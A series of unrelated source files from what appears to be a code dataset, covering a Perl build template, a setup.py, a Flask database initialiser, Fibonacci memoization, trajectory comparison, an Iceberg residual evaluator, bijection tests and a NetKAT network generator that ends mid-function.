"perl-Math-BigInt=1.999818-r1",
"perl-Math-BigInt-FastCalc=0.5009-r1",
"perl-Math-BigRat=0.2614-r1",
"perl-Math-Complex=1.59.01-r1",
"perl-Memoize=1.03.01-r1",
"perl-Module-CoreList=5.20210123-r1",
"perl-Module-Load=0.34-r1",
"perl-Module-Load-Conditional=0.70-r1",
"perl-Module-Loaded=0.08-r1",
"perl-Module-Metadata=1.000037-r1",
"perl-NEXT=0.67.01-r1",
"perl-Net-Ping=2.72-r1",
"perl-Params-Check=0.38-r1",
"perl-PathTools=3.78-r1",
"perl-Perl-OSType=1.010-r1",
"perl-PerlIO-via-QuotedPrint=0.08-r1",
"perl-Pod-Checker=1.73-r1",
"perl-Pod-Escapes=1.07-r1",
"perl-Pod-Perldoc=3.2801-r1",
"perl-Pod-Simple=3.40-r1",
"perl-Pod-Usage=1.69-r1",
"perl-Safe=2.41.01-r1",
"perl-Scalar-List-Utils=1.55-r1",
"perl-Search-Dict=1.07-r1",
"perl-SelfLoader=1.26-r1",
"perl-Socket=2.029-r1",
"perl-Storable=3.21-r1",
"perl-Sys-Syslog=0.36-r1",
"perl-Term-ANSIColor=5.01-r1",
"perl-Term-Cap=1.17-r1",
"perl-Term-Complete=1.403-r1",
"perl-Term-ReadLine=1.17-r1",
"perl-Test=1.31-r1",
"perl-Test-Harness=3.42-r1",
"perl-Test-Simple=1.302175-r1",
"perl-Text-Abbrev=1.02-r1",
"perl-Text-Balanced=2.03-r1",
"perl-Text-ParseWords=3.30-r1",
"perl-Text-Tabs-2013.0523-r1",
"perl-Thread-Queue=3.14-r1",
"perl-Thread-Semaphore=2.13-r1",
"perl-Tie-File=1.06-r1",
"perl-Tie-RefHash=1.39-r1",
"perl-Time-HiRes=1.9764-r1",
"perl-Time-Local=1.28-r1",
"perl-Time-Piece=1.3401-r1",
"perl-Unicode-Collate=1.27-r1",
"perl-Unicode-Normalize=1.27-r1",
"perl-Win32=0.53-r1",
"perl-Win32API-File=0.1203.01-r1",
"perl-XSLoader=0.30-r1",
"perl-autodie=2.32-r1",
"perl-autouse=1.11-r1",
"perl-base=2.27-r1",
"perl-bignum=0.51-r1",
"perl-constant=1.33-r1",
"perl-encoding-warnings=0.13-r1",
"perl-experimental=0.020-r1",
"perl-if=0.0608-r1",
"perl-lib=0.65-r1",
"perl-libnet=3.11-r1",
"perl-parent=0.238-r1",
"perl-perlfaq=5.20200523-r1",
"perl-podlators=5.008-r1",
"perl-threads=2.25-r1",
"perl-threads-shared=1.61-r1",
"perl-version=0.9924-r1",
]
def pre_patch(self):
for f in (self.cwd / f"perl-{pkgver}").iterdir():
self.mv(f, ".")
for f in (self.cwd / f"perl-cross-{_perl_cross_ver}").iterdir():
if f.name == "utils":
self.mv(f / "Makefile", "utils")
f.rmdir()
continue
self.mv(f, ".")
def init_configure(self):
from cbuild.util import make
self.make = make.Make(self, wrksrc = ".")
self.env["HOSTCFLAGS"] = "-D_GNU_SOURCE"
self.tools["LD"] = self.tools["CC"]
# to prevent perl buildsystem from invoking bmake
self.env["MAKE"] = self.make.get_command()
def do_configure(self):
cargs = [
"--prefix=/usr",
"-Dusethreads", "-Duseshrplib", "-Dusesoname", "-Dusevendorprefix",
"-Dprefix=/usr", "-Dvendorprefix=/usr",
"-Dprivlib=/usr/share/perl5/core_perl",
"-Darchlib=/usr/lib/perl5/core_perl",
"-Dsitelib=/usr/share/perl5/site_perl",
"-Dsitearch=/usr/lib/perl5/site_perl",
"-Dvendorlib=/usr/share/perl5/vendor_perl",
"-Dvendorarch=/usr/lib/perl5/vendor_perl",
"-Dscriptdir=/usr/bin", "-Dvendorscript=/usr/bin",
"-Dinc_version_list=none", "-Dman1ext=1p", "-Dman3ext=3p",
"-Dman1dir=/usr/share/man/man1",
"-Dman3dir=/usr/share/man/man3",
"-Dd_sockaddr_in6=define",
]
if self.cross_build:
cargs.append("--target=" + self.build_profile.short_triplet)
cfl = self.get_cflags(shell = True)
lfl = self.get_ldflags(shell = True)
cargs.append("-Dcccdlflags=-fPIC")
cargs.append("-Doptimize=-Wall " + cfl)
cargs.append("-Dccflags=" + cfl)
cargs.append("-Dlddlflags=-shared " + lfl)
cargs.append("-Dldflags=" + lfl)
cargs.append("-Dperl_static_inline=static __inline__")
cargs.append("-Dd_static_inline")
self.do(self.chroot_cwd / "configure", cargs)
def do_check(self):
from cbuild.util import make
self.env["TEST_JOBS"] = str(make.jobs())
self.make.invoke("test")
def post_install(self):
for f in (self.destdir / "usr/share").rglob("*"):
if f.is_file() and not f.is_symlink():
f.chmod(0o644)
for f in (self.destdir / "usr/lib").rglob("*"):
if f.is_file() and not f.is_symlink():
f.chmod(0o644)
self.install_link("perl", f"usr/bin/perl{pkgver}")
# remove all pod files except those under
# /usr/share/perl5/core_perl/pod/ (FS#16488)
for f in (self.destdir / "usr/share/perl5/core_perl").glob("*.pod"):
f.unlink()
for d in (self.destdir / "usr/share/perl5/core_perl").iterdir():
if not d.is_dir() or d.name == "pod":
continue
for f in d.rglob("*.pod"):
f.unlink()
for f in (self.destdir / "usr/lib").rglob("*.pod"):
f.unlink()
for f in self.destdir.rglob(".packlist"):
f.unlink()
import re
import os
cfpath = self.destdir / "usr/lib/perl5/core_perl/Config_heavy.pl"
with open(cfpath) as ifile:
with open(self.cwd / "Config_heavy.pl.new", "w") as ofile:
for ln in ifile:
ln = re.sub("-specs=.*hardened-ld", "", ln)
ln = re.sub("-specs=.*hardened-cc1", "", ln)
ofile.write(ln)
cfpath.unlink()
os.rename(self.cwd / "Config_heavy.pl.new", cfpath)
cfpath.chmod(0o644)
| StarcoderdataPython |
1602436 | #!/usr/bin/env python3
from setuptools import setup, find_packages
import sys
VERSION = '0.1'
DESCRIPTION = 'Python import/export data in tecplot format'
with open('README.md') as f:
LONG_DESCRIPTION = ''.join(f.readlines())
if sys.version_info[:2] < (3, 5):
raise RuntimeError("Python version >= 3.5 required.")
setup(
version=VERSION,
name='py2tec',
author='luohancfd',
author_email='<EMAIL>',
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url="https://github.com/luohancfd/py2tec",
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'Topic :: Scientific/Engineering :: Atmospheric Science',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)'
],
license="GPLv3+",
keywords=["Tecplot"],
platforms=["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
python_requires='>=3.5',
install_requires=['numpy'],
packages=find_packages(exclude=["contrib", "docs", "tests*"])
)
| StarcoderdataPython |
108691 | <filename>app/init_db_objects.py<gh_stars>1-10
import datetime
from flask_sqlalchemy import SQLAlchemy
from app.models import Category, Currency, CurrencyRate
from app.user_models import User, ACCESS_LEVEL
from config import Config
# db = SQLAlchemy()
# migrate = Migrate()
# app = Flask(__name__)
# app.config.from_object(Config)
# db.init_app(app)
# app = None
class InitDB():
def __init__(self, app):
self.db = SQLAlchemy()
self.app = app
def init_all(self):
self.init_admin()
self.init_categories()
self.init_currencies()
self.do()
print("All necessary db objects successfully written!")
def init_admin(self):
with self.app.app_context():
if not User.query.filter_by(id=Config.TG_ADMIN_ID).first():
a = User()
a.id = Config.TG_ADMIN_ID
a.name = "superadmin"
a.access_level = ACCESS_LEVEL.ADMIN
self.db.session.add(a)
return self
def init_categories(self):
with self.app.app_context():
categories = {
1: Category()._construct(1, "income", "Доход", 1, "💰"),
2: Category()._construct(2, "transport", "Транспорт", 2, "🚕"),
3: Category()._construct(3, "supermarkets", "Супермаркеты", 3, "🏪"),
4: Category()._construct(4, "cafe", "Кафе", 4, "🍽"),
5: Category()._construct(5, "household", "Хозяйство", 5, "🛠"),
6: Category()._construct(6, "evolution", "Развитие", 6, "🧩"),
7: Category()._construct(7, "entertainment", "Развлечения", 7, "🎉"),
8: Category()._construct(8, "goods", "Вещи", 8, "💍"),
9: Category()._construct(9, "service", "Банки,гос,связь", 9, "🏛"),
10: Category()._construct(10, "gifts", "Подарки", 10, "🎁"),
11: Category()._construct(11, "donation", "Донаты", 11, "📥"),
13: Category()._construct(13, "investments", "Инвестиции", 13, "📊"),
14: Category()._construct(14, "health", "Здоровье", 14, "🍏"),
15: Category()._construct(15, "beauty", "Красота", 12, "💄"),
12: Category()._construct(12, "other", "Другое", 15, "❔"),
}
ids = [c.id for c in Category.query.all()]
for id, category in categories.items():
if id not in ids:
self.db.session.add(category)
return self
def init_currencies(self):
with self.app.app_context():
currencies = {
"rub": 1,
"idr": 5.5,
"usd": 73,
"eur": 88.5,
"gel": 23.5
}
currencies_db = Currency.get_all()
if len(currencies_db) == 0:
for iso, rate in currencies.items():
c = Currency()
c.iso = iso
if iso == "rub":
c.default = True
self.db.session.add(c)
cr = CurrencyRate()
cr.iso = iso
cr.date = datetime.date.today()
cr.rate = rate
self.db.session.add(cr)
return self
def do(self):
self.db.session.commit()
| StarcoderdataPython |
63938 | <gh_stars>1000+
# source: http://oeis.org/A000045
fibo_seq = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610,
987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025,
121393, 196418, 317811, 514229, 832040, 1346269, 2178309,
3524578, 5702887, 9227465, 14930352, 24157817, 39088169]
from functools import lru_cache
def fibonacci(n):
if n < 2:
return n
return fibonacci(n-2) + fibonacci(n-1)
@lru_cache()
def fibonacci2(n):
if n < 2:
return n
return fibonacci2(n-2) + fibonacci2(n-1)
def memoize(func):
'''simplest memoizing decorator'''
cache = {}
def memoized(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoized
def test():
for i, expected in enumerate(fibo_seq[:31]):
print(i, expected)
assert fibonacci(i) == expected
def chronograph():
global fibonacci
from time import time
t0 = time()
n = 32
res = fibonacci(n)
#res = [fibonacci(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
res = fibonacci2(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
fibonacci = memoize(fibonacci)
res = fibonacci(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
if __name__=='__main__':
#test()
chronograph()
| StarcoderdataPython |
80619 | <filename>docs/examples/plot_comparing.py
"""
Comparing
---------
traja allows comparing trajectories using various methods.
"""
import traja
df = traja.generate(seed=0)
df.traja.plot()
###############################################################################
# Fast Dynamic Time Warping of Trajectories
# =========================================
#
# Fast dynamic time warping can be performed using ``fastdtw``.
# Source article: `link <https://cs.fit.edu/~pkc/papers/tdm04.pdf>`_.
import numpy as np
rotated = traja.rotate(df, angle=np.pi / 10)
rotated.traja.plot()
###############################################################################
# Compare trajectories hierarchically
# ===================================
# Hierarchical agglomerative clustering allows comparing trajectories as actograms
# and finding nearest neighbors. This is useful for comparing circadian rhythms,
# for example.
# Generate random trajectories
trjs = [traja.generate(seed=i) for i in range(20)]
# Calculate displacement
displacements = [trj.traja.calc_displacement() for trj in trjs]
traja.plot_clustermap(displacements)
###############################################################################
# Compare trajectories point-wise
# ===============================
dist = traja.distance_between(df.traja.xy, rotated.traja.xy)
print(f"Distance between the two trajectories is {dist}")
| StarcoderdataPython |
1678679 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import threading
from .expressions import Expressions, ExpressionVisitors
from .predicate import BoundPredicate, Predicate, UnboundPredicate
class ResidualEvaluator(object):
def visitor(self):
if not hasattr(self.thread_local_data, "visitors"):
self.thread_local_data.visitors = ResidualVisitor()
return self.thread_local_data.visitors
def __init__(self, spec, expr):
self._spec = spec
self._expr = expr
self.thread_local_data = threading.local()
def residual_for(self, partition_data):
return self.visitor().eval(partition_data)
class ResidualVisitor(ExpressionVisitors.BoundExpressionVisitor):
def __init__(self):
self.struct = None
def eval(self, struct):
self.struct = struct
def always_true(self):
return Expressions.always_true()
def always_false(self):
return Expressions.always_false()
def is_null(self, ref):
return self.always_true() if ref.get(self.struct) is None else self.always_false()
def not_null(self, ref):
return self.always_true() if ref.get(self.struct) is not None else self.always_false()
def lt(self, ref, lit):
return self.always_true() if ref.get(self.struct) < lit.value else self.always_false()
def lt_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) <= lit.value else self.always_false()
def gt(self, ref, lit):
return self.always_true() if ref.get(self.struct) > lit.value else self.always_false()
def gt_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) >= lit.value else self.always_false()
def eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) == lit.value else self.always_false()
def not_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) != lit.value else self.always_false()
def not_(self, result):
return Expressions.not_(result)
def and_(self, left_result, right_result):
return Expressions.and_(left_result, right_result)
def or_(self, left_result, right_result):
return Expressions.or_(left_result, right_result)
def predicate(self, pred):
if isinstance(pred, BoundPredicate):
return self.bound_predicate(pred)
elif isinstance(pred, UnboundPredicate):
return self.unbound_predicate(pred)
raise RuntimeError("Invalid predicate argument %s" % pred)
def bound_predicate(self, pred):
part = self.spec.get_field_by_source_id(pred.ref.field_id)
if part is None:
return pred
strict_projection = part.transform.project_strict(part.name, pred)
if strict_projection is None:
bound = strict_projection.bind(self.spec.partition_type())
if isinstance(bound, BoundPredicate):
return super(ResidualVisitor, self).predicate(bound)
return bound
return pred
def unbound_predicate(self, pred):
bound = pred.bind(self.spec.schema.as_struct())
if isinstance(bound, BoundPredicate):
bound_residual = self.predicate(bound)
if isinstance(bound_residual, Predicate):
return pred
return bound_residual
return bound
| StarcoderdataPython |
1602985 | import numpy as np
from py.forest import Node
class Cube():
def __init__(self, node):
assert isinstance(node, Node)
self.start = node.start
self.end = node.end
self.dim = node.dim
self.id_string = node.id_string
self.split_axis = node.split_axis
self.split_vals = node.split_vals
self.vol = 1
for i in range(len(self.start)):
self.vol = self.vol*(self.end[i] - self.start[i])
self.frac = 0
self.child = [Cube(child_node) for child_node in node.child]
def est_density(self, pts, total):
self.frac = len(pts)/total
if self.split_axis != -1:
split_pts = self.split_points(pts)
for i in range(len(self.child)):
self.child[i].est_density(split_pts[i], total)
def split_points(self, pts):
_, num_pts = np.shape(pts)
indices = [[] for _ in range(len(self.split_vals) + 1)]
list_vals = [self.start[self.split_axis]]
list_vals.append(self.split_vals)
list_vals.append(self.end[self.split_axis])
for i in range(num_pts):
for j in range(len(list_vals) -1):
if (pts[self.split_axis][i] >= list_vals[j]) and\
(pts[self.split_axis][i] < list_vals[j+1]):
indices[j].append(i)
split_pts = []
for j in range(len(list_vals) -1):
split_pts.append(pts[:, indices[j]])
return split_pts
def __str__(self):
str_val = "Cube ID: " + str(self.id_string) + "\n"
str_val += "Boundary: "
for i in range(self.dim):
str_val += " [" + str(self.start[i]) + ", " + str(self.end[i]) + "]"
if i < self.dim -1:
str_val += " x"
else:
str_val += "\n"
if self.split_axis != -1:
str_val += "Axis: " + str(self.split_axis) + ", "
str_val += "Split Values: " + str(self.split_vals)
return str_val
def print_cube(self):
print_list = [self]
while print_list:
cube = print_list.pop(0)
print(str(cube))
print_list.extend(cube.child)
| StarcoderdataPython |
99673 | import numpy as np
import torch
import torch.nn as nn
import torchtestcase
import unittest
from survae.transforms.bijections.coupling import *
from survae.nn.layers import ElementwiseParams, ElementwiseParams2d
from survae.tests.transforms.bijections import BijectionTest
class AdditiveCouplingBijectionTest(BijectionTest):
def test_bijection_is_well_behaved(self):
batch_size = 10
self.eps = 1e-6
for shape in [(6,),
(6,8,8)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Linear(3,3)
if len(shape) == 3: net = nn.Conv2d(3,3, kernel_size=3, padding=1)
else:
if len(shape) == 1: net = nn.Linear(1,5)
if len(shape) == 3: net = nn.Conv2d(1,5, kernel_size=3, padding=1)
bijection = AdditiveCouplingBijection(net, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
class AffineCouplingBijectionTest(BijectionTest):
def test_bijection_is_well_behaved(self):
batch_size = 10
self.eps = 5e-6
for shape in [(6,),
(6,8,8)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Sequential(nn.Linear(3,3*2), ElementwiseParams(2))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(3,3*2, kernel_size=3, padding=1), ElementwiseParams2d(2))
else:
if len(shape) == 1: net = nn.Sequential(nn.Linear(1,5*2), ElementwiseParams(2))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(1,5*2, kernel_size=3, padding=1), ElementwiseParams2d(2))
bijection = AffineCouplingBijection(net, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1690418 | <gh_stars>1-10
#!/usr/bin/python
import argparse
import networkx
import random
import sys
debug = False
# Each host has PROB_NONLOCAL_HOST chance to be in a subnet different from its
# physical location.
PROB_NONLOCAL_HOST = 0.1
class Host:
# mac (int): host mac address
# ip (string): host ip address
# vlan (int): vlan
def __init__(self, mac, ip, vlan):
self.mac = mac
self.ip = ip
self.vlan = vlan
class LAN:
# LAN objects are initialized with their subnet, eg. "192.168.1" and a list
# of host IDs. NB: Each host is assumed to have a MAC address equal to its
# ID.
def __init__(self, subnet, router, switches, hosts, vlan):
assert(len(hosts) <= 256)
self.subnet = subnet
self.router = router
self.switches = switches
self.hosts = hosts
self.vlan = vlan
def __str__(self):
return '<LAN %s: %s>' % (self.subnet, ', '.join(map(lambda h: 'Host %d (%s)' % (h.mac, h.ip), self.hosts)))
def get_local_hosts(self):
return filter(lambda h: h.ip.startswith(self.subnet), self.hosts)
def get_nonlocal_hosts(self):
return filter(lambda h: not h.ip.startswith(self.subnet), self.hosts)
# Produce a Waxman graph with edges added between unconnected components.
def connected_waxman_graph(n):
g = networkx.waxman_graph(n)
if networkx.is_connected(g):
return g
ccs = [x for x in networkx.connected_components(g)]
while len(ccs) > 1:
cc1 = random.choice(ccs)
cc2 = random.choice(ccs)
while cc1 == cc2:
cc2 = random.choice(ccs)
g.add_edge(random.sample(cc1, 1)[0], random.sample(cc2, 1)[0])
ccs.remove(cc2)
if not networkx.is_connected(g):
sys.stderr.write('%s\n' % g.edges())
assert(networkx.is_connected(g))
return g
# Given a LAN number, convert to "X.Y.Z" such that
# n = X * (256 * 256) + Y * 256 + Z.
def convert_to_subnet(lan):
assert(lan <= 16777216)
part_1 = (int)(lan / 65536)
part_2 = (int)((lan % 65536) / 256)
part_3 = (int)(lan % 256)
assert(part_1 * 65536 + part_2 * 256 + part_3 == lan)
return '%d.%d.%d' % (part_1, part_2, part_3)
# Given a LAN number n and host ID h (i.e. MAC address), return an IP address
# "X.Y.Z.M" such that "X.Y.Z" = convert_to_subnet(n) and M = h % 256.
def convert_to_ip(lan, host):
return '%s.%d' % (convert_to_subnet(lan), host % 256)
def int_of_ip(ip):
parts = ip.split('.')
return ( int (parts[0]) * 256 * 256 * 256
+ int (parts[1]) * 256 * 256
+ int (parts[2]) * 256
+ int (parts[3]) )
# Generate a NetKAT topology from a networkx graph.
def topology_of_networkx(g):
t = []
for n in g:
if not g.node[n]['type'] == 'host':
for (neighbor, port) in g.node[n]['ports'].iteritems():
t.append('sw = %d; port = %d; sw := %d; port := %d' % (
n, port, neighbor, g.node[neighbor]['ports'][n]))
return '\n+ '.join(t)
def export_topology_of_networkx(g, out):
for n in g:
for (neighbor, port) in g.node[n]['ports'].iteritems():
out.write('(%s %d, %d)--(%s %d, %d)\n' % (
g.node[n]['type'].upper(), n, port,
g.node[neighbor]['type'].upper(), neighbor,
g.node[neighbor]['ports'][n]))
# Will return '' for a path of length 1 (i.e. a self loop).
def policy_of_path(g, path, target, ethDst_of_target):
assert(len(path) > 0)
switch_pols = []
current = path[0]
for n in path[1:]:
if 'host' in g.node[target]:
switch_pols.append('sw = %d; ethDst = %d; ip4Dst = %d; vlan = %d; port := %d' % (
current,
ethDst_of_target(target),
int_of_ip(g.node[target]['host'].ip),
g.node[target]['host'].vlan,
g.node[current]['ports'][n]))
else:
switch_pols.append('sw = %d; ethDst = %d; port := %d' % (
current,
ethDst_of_target(target),
g.node[current]['ports'][n]))
current = n
return '\n+ '.join(switch_pols)
# Generate a NetKAT policy encoding shortest path L2 forwarding for a networkx
# graph where nodes are annotated with type='switch' | 'router' | 'host' and port
# dictionaries. Routers are assumed to be the edges of the network and have
# MAC addresses equal to their node ID.
def spp_of_networkx(g, ethDst_of_target=(lambda x: x)):
routers = [n for (n, data) in filter(
lambda (n, data): data['type'] == 'router' or data['type'] == 'host',
g.nodes(data=True))]
# TODO: switch this to compute shortest path from all nodes to each router.
# Then, for each node for each target router, compute a policy for the next
# hop.
paths = []
for r1 in routers:
for r2 in routers:
if r1 == r2:
continue
path = networkx.shortest_path(g, source=r1, target=r2)
if g.node[path[0]]['type'] == 'host':
path = path[1:]
p = policy_of_path(g, path, r2, ethDst_of_target)
if len(p) > 0:
paths.append(p)
return '\n+ '.join(paths)
def cocoon_of_networkx(g):
targets = [n for (n, data) in filter(
lambda (n, data): data['type'] == 'router' or data['type'] == 'host',
g.nodes(data=True))]
# TODO: switch this to compute shortest path from all nodes to each router.
# Then, for each node for each target router, compute a policy for the next
# hop.
distances = {}
out_ports = {}
for sw in g:
if g.node[sw]['type'] == 'host':
continue
distances[sw] = {}
out_ports[sw] = {}
for r in targets:
if sw == r:
continue
# TODO: it's grossly inefficient to recompute the path for every
# switch.
path = networkx.shortest_path(g, source=sw, target=r)
distances[sw][r] = len(path) - 1
out_ports[sw][r] = g.node[sw]['ports'][path[1]]
return (distances, out_ports)
# Produce a new graph composing g1 and g2. Copy dictionary attributes.
def copy_compose(g1, g2):
g = networkx.Graph()
for n in g1.nodes() + g2.nodes():
g.add_node(n)
for (n1, n2) in g1.edges() + g2.edges():
g.add_edge(n1, n2)
for n in g1:
for k in g1.node[n]:
if type(g1.node[n][k]) == dict:
g.node[n][k] = dict(g1.node[n][k])
else:
g.node[n][k] = g1.node[n][k]
for n in g2:
for k in g2.node[n]:
if type(g2.node[n][k]) == dict:
g.node[n][k] = dict(g2.node[n][k])
else:
g.node[n][k] = g2.node[n][k]
return g
# Add a dictionary to each node mapping neighboring nodes to port numbers.
# Port numbers start at 2.
def add_ports_to_networkx(g, starting_port):
for n in g:
d = {}
p = starting_port
for neighbor in g[n].keys():
d[neighbor] = p
p += 1
g.node[n]['ports'] = d
# Sanity check on port assignments.
def check_networkx(g):
for n in g:
for neighbor in g[n].keys():
if neighbor not in g.node[n]['ports']:
print '%s %d not in ports for neighbor %s %d' % (
g.node[neighbor]['type'], neighbor, g.node[n]['type'], n)
assert(neighbor in g.node[n]['ports'])
# High-level spec for the Purdue network: All hosts are grouped by subnet, can
# communicate within the subnet, and inter-subnet traffic goes through an ACL.
class Spec0:
def __init__(self, local, remote):
self.local = local
self.remote = remote
def __str__(self):
return '%s\n\n+\n\n%s' % (self.local, self.remote)
# Spec0 refactored into an OpenFlow-friendly format of policy; topology for one
# big switch.
class Spec0_1:
def __init__(self, local, remote, host_topo, router_topo, host_switches):
self.local = local
self.remote = remote
self.host_topo = host_topo
self.router_topo = router_topo
self.host_switches = host_switches
def __str__(self):
return '''
( {host_topo} );
(
(( {local} )
+
( {remote} ))
;
( {router_topo} ))*
;
( {host_switches} ); port = 1
'''.format( host_switches=self.host_switches
, host_topo=self.host_topo
, router_topo=self.router_topo
, local=self.local
, remote=self.remote )
# Distribute access control to each LAN gateway.
class Spec1:
def __init__(self, local, host_to_router, router_to_router, router_to_host, host_switches):
self.local = local
self.host_to_router = host_to_router
self.router_to_router = router_to_router
self.router_to_host = router_to_host
self.host_switches = host_switches
def __str__(self):
return '''
( {local} )
+
( {host_switches} );
port = 0;
(
( {host_to_router} )
+
( {router_to_router} )
+
( {router_to_host} )
)* ;
( {host_switches} );
port = 1
'''.format( local=self.local
, host_to_router=self.host_to_router
, router_to_router=self.router_to_router
, router_to_host=self.router_to_host
, host_switches=self.host_switches )
class Spec1_1:
def __init__( self
, preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, hosts):
self.preface = preface
self.router_to_host_topo = router_to_host_topo
self.router_to_host_pol = router_to_host_pol
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.hosts = hosts
def __str__(self):
return '''
( {hosts} ); port = 0;
( {preface} );
(
( ( {router_to_host_pol} )
+
( {router_to_router_pol} ) )
;
( ( {router_to_host_topo} )
+
( {router_to_router_topo} ) )
)*;
( {hosts} ); port = 1
'''.format( preface=self.preface
, router_to_host_topo = self.router_to_host_topo
, router_to_host_pol = self.router_to_host_pol
, router_to_router_topo = self.router_to_router_topo
, router_to_router_pol = self.router_to_router_pol
, hosts = self.hosts )
class Spec2_1:
def __init__( self
, preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, router_to_router_preface
, router_to_router_tail
, hosts):
self.preface = preface
self.router_to_host_topo = router_to_host_topo
self.router_to_host_pol = router_to_host_pol
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.router_to_router_preface = router_to_router_preface
self.router_to_router_tail = router_to_router_tail
self.hosts = hosts
def __str__(self):
return '''
( {hosts} ); port = 0;
( {preface} );
(
(
( {router_to_router_tail} )
;
( {router_to_host_pol} )
+
( {router_to_router_preface} )
;
( {router_to_router_pol} )
) ; (
( {router_to_host_topo} )
+
( {router_to_router_topo} )
)
)*;
( {hosts} ); port = 1
'''.format( preface=self.preface
, router_to_host_topo = self.router_to_host_topo
, router_to_host_pol = self.router_to_host_pol
, router_to_router_topo = self.router_to_router_topo
, router_to_router_pol = self.router_to_router_pol
, router_to_router_preface = self.router_to_router_preface
, router_to_router_tail = self.router_to_router_tail
, hosts = self.hosts )
# Add L2 switching between routers.
class Spec2:
def __init__(self, local, host_to_router, router_to_router_topo, router_to_router_pol, router_to_host, host_switches):
self.local = local
self.host_to_router = host_to_router
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.router_to_host = router_to_host
self.host_switches = host_switches
def __str__(self):
return '''
( {local} )
+
( {host_switches} );
port = 0;
(
( {host_to_router} )
+
({router_to_router_pol});
( ({router_to_router_topo}); ({router_to_router_pol}) )*
+
( {router_to_host} )
)* ;
( {host_switches} );
port = 1
'''.format( local=self.local
, host_to_router=self.host_to_router
, router_to_router_topo=self.router_to_router_topo
, router_to_router_pol=self.router_to_router_pol
, router_to_host=self.router_to_host
, host_switches=self.host_switches )
# Add L2 switching between hosts and their gateways, randomly move some hosts
# out of their subnet LANs, and add VLANs.
class Spec3:
def __init__(self, preface, local_topos, local_pols, router_to_router_topo, router_to_router_pol, host_switches):
self.preface = preface
self.local_topos = local_topos
self.local_pols = local_pols
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.host_switches = host_switches
def __str__(self):
return '''
( {host_switches} );
port = 0;
( {preface} );
(
(
( {local_pols} )
+
( {router_to_router_pol} )
) ; (
( {local_topos} )
+
( {router_to_router_topo} )
)
)* ;
( {host_switches} );
port = 1
'''.format( preface=self.preface
, local_topos=self.local_topos
, local_pols=self.local_pols
, router_to_router_topo=self.router_to_router_topo
, router_to_router_pol=self.router_to_router_pol
, host_switches=self.host_switches )
# TODO: split router_to_router as well?
class PurdueNetwork:
def __init__(self, args):
self.num_lans = args.num_lans
self.num_hosts_per_lan = args.num_lan_hosts
self.num_acl_rules = args.num_acl_rules
self.num_routers = args.num_fabric_switches
self.num_switches_per_lan = args.num_lan_switches
self.args = args
self.next_id = 1
assert(0 < self.num_hosts_per_lan <= 256)
assert(1 < self.num_lans <= 16777216)
# Build virtual LANs.
def mkHost(lan_num, host_num, vlan):
ip = convert_to_ip(lan_num, host_num)
return Host(host_num, ip, vlan)
def mkLAN(lan_num):
subnet = convert_to_subnet(lan_num)
hosts = map(lambda i: mkHost(lan_num, self.get_next_id(), lan_num), range(self.num_hosts_per_lan))
return LAN(subnet, self.get_next_id(), [], hosts, lan_num)
self.lans = map(mkLAN, range(1,self.num_lans+1))
self.subnet_to_lan = {self.lans[i].subnet : i for i in xrange(len(self.lans)) }
# Build ACL.
self.acl_pairs = []
for i in xrange(self.num_acl_rules):
lan1idx = random.randrange(len(self.lans))
lan2idx = random.randrange(len(self.lans))
while lan1idx == lan2idx:
lan2idx = random.randrange(len(self.lans))
lan1 = self.lans[lan1idx]
lan2 = self.lans[lan2idx]
h1 = lan1.hosts[random.randrange(len(lan1.hosts))]
h2 = lan2.hosts[random.randrange(len(lan2.hosts))]
self.acl_pairs.append((h1, h2))
def lan_of_subnet(self, subnet):
